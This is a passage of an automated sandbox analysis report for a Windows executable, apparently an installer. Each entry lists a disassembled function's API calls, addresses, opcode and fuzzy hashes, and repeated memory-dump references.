                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                            • Instruction ID: abb9b97bb193dfeb05d9d82a7f41705a61c143c3b7d9841fcbe573c2d8062a85
                                                            • Opcode Fuzzy Hash: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                            • Instruction Fuzzy Hash: C4F081B36406046F5745EE9DA881DAB77ECEE89364310015FF908D7302EA39DD51477A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0050E958, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000000), ref: 0050E96E
                                                            • GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
                                                            • GetPropW.USER32 ref: 0050E99A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                            • String ID:
                                                            • API String ID: 2582817389-0
                                                            • Opcode ID: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                            • Instruction ID: 299b27e64c01e87a133ce8a54c99347aef86e5c58dac0e1e1101b5cceb09c5b5
                                                            • Opcode Fuzzy Hash: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                            • Instruction Fuzzy Hash: 09F0ECA160511166CB60BBB65C8787F5A8C9FC43907751D2BF841DA192D514CC8142FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006A5D88, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000008), ref: 006A5D91
                                                            • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A5D97
                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A5DB9
                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A5DCA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                            • String ID:
                                                            • API String ID: 215268677-0
                                                            • Opcode ID: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                            • Instruction ID: 606920211f29873d44d72264013709cf63daaae85b794eef22724c21b877f5a5
                                                            • Opcode Fuzzy Hash: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                            • Instruction Fuzzy Hash: 30F030716043017BD700EAB58D82EDB77DCAF45715F00482DBA98C7281DA38ED489766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004F5548, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 004F5551
                                                            • SelectObject.GDI32(00000000,058A00B4), ref: 004F5563
                                                            • GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F556E
                                                            • ReleaseDC.USER32 ref: 004F557F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MetricsObjectReleaseSelectText
                                                            • String ID:
                                                            • API String ID: 2013942131-0
                                                            • Opcode ID: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                            • Instruction ID: eb0f3ac5e6ff13c2d338f041733c2278b611cd6d279531a3f0c2a93b6799ed89
                                                            • Opcode Fuzzy Hash: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                            • Instruction Fuzzy Hash: 64E0DF71E029A432D61071661C82BEF2A498F823AAF08112BFF08992D1DA0CC94083FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B72C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B7302
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window
                                                            • String ID: /INITPROCWND=$%x $@
                                                            • API String ID: 2353593579-4169826103
                                                            • Opcode ID: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                            • Instruction ID: aee196482ecc750f80196a5b85e8ce4b28bd470815894a77b79cec9963f5eee4
                                                            • Opcode Fuzzy Hash: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                            • Instruction Fuzzy Hash: 0721C070A083489FDB01EBA4D841FEE77F6EF89304F51447AF800E7291DA38AA45DB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00435608, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(FYC), ref: 00435618
                                                              • Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocInitStringVariant
                                                            • String ID: FYC$kYC
                                                            • API String ID: 4010818693-1629163012
                                                            • Opcode ID: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                            • Instruction ID: 78d3457c21f8c6ae710edabf1b7f51a26e4fb704544ac86c5ed1d2f79e361521
                                                            • Opcode Fuzzy Hash: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                            • Instruction Fuzzy Hash: 2FF08171704608AFD700EB95CC52E9EB3F8EB4D700FA04176F604E3690DA346E04C769
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B8CAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 006ACE20: FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                              • Part of subcall function 006ACB10: GetTickCount.KERNEL32 ref: 006ACB58
                                                              • Part of subcall function 00615560: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 0061557F
                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B97CB), ref: 006B8D01
                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B97CB), ref: 006B8D07
                                                            Strings
                                                            • Detected restart. Removing temporary directory., xrefs: 006B8CBB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                            • String ID: Detected restart. Removing temporary directory.
                                                            • API String ID: 1717587489-3199836293
                                                            • Opcode ID: ba331b089060afb977d72fce05483963aa44ed152fcb3281d86fb57da4e379c7
                                                            • Instruction ID: 85aea6856e01ecd59818c985a9c9c54c6fb1bec533a363d5825b66760217dfd7
                                                            • Opcode Fuzzy Hash: ba331b089060afb977d72fce05483963aa44ed152fcb3281d86fb57da4e379c7
                                                            • Instruction Fuzzy Hash: 38E0E5F16082446EE2417BB9FC13DA67F9FDB86764B51043BF50083542D9295C80C338
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C86E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C86FA
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                              • Part of subcall function 005C8644: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: HandleModule$AddressProc
                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                            • API String ID: 1883125708-2676053874
                                                            • Opcode ID: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
                                                            • Instruction ID: 33574298acf09a9ab3b8dc906f6acd80ea038e69245e9512450f7745a5549cab
                                                            • Opcode Fuzzy Hash: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
                                                            • Instruction Fuzzy Hash: F7F0A070702610DFD715EBA9AC89F662FE6EB84345F30142EF1069B691DBB60880C699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C8790, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005C8820: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019,?,00000000,006B80E6), ref: 005C87A8
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: HandleModule$AddressProc
                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                            • API String ID: 1883125708-2866557904
                                                            • Opcode ID: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
                                                            • Instruction ID: 7110eff28424d8e01fad9884693b7150e68d4fec514983f83c6ed3211673b8d3
                                                            • Opcode Fuzzy Hash: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
                                                            • Instruction Fuzzy Hash: E7E0C2623402212E020071FF2C85F7F08CCEDC8B6A3300C3EB200D3501EE5ACC0101AC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C7488, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060D678,00000000,0060D74A,?,?,006D579C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C74A2
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 1646373207-1816364905
                                                            • Opcode ID: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
                                                            • Instruction ID: e1b2a1fbaeccbf4b8658dcbc551e8be6aafa7850fd628b76cf9cecd9236f8401
                                                            • Opcode Fuzzy Hash: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
                                                            • Instruction Fuzzy Hash: 95E0DFB07047051BDF1061FA8CC3F9A1D896BDC794F20483E3A90D66C2F9ACD9400AAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C8644, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                            • API String ID: 1646373207-2498399450
                                                            • Opcode ID: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
                                                            • Instruction ID: f5cb7bf2fd8e9c4876a78839223762f9bc4b5f6247b358773db5c5b1cf956787
                                                            • Opcode Fuzzy Hash: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
                                                            • Instruction Fuzzy Hash: 4CE01AB4A01701DED711ABA6AC49FE93BEEE798305F20641EB246D6695CBB904C0CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C8820, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                            • API String ID: 1646373207-260599015
                                                            • Opcode ID: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
                                                            • Instruction ID: f0c74795214b74e90bc607b5066537e4d8d40fa8e1211c6ca3dcb32fdea7855f
                                                            • Opcode Fuzzy Hash: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
                                                            • Instruction Fuzzy Hash: 22D0C7B37117222A651075FA3CE1FF70A8CDD95795354087EF700E2941DD55DC4111A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B9800, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
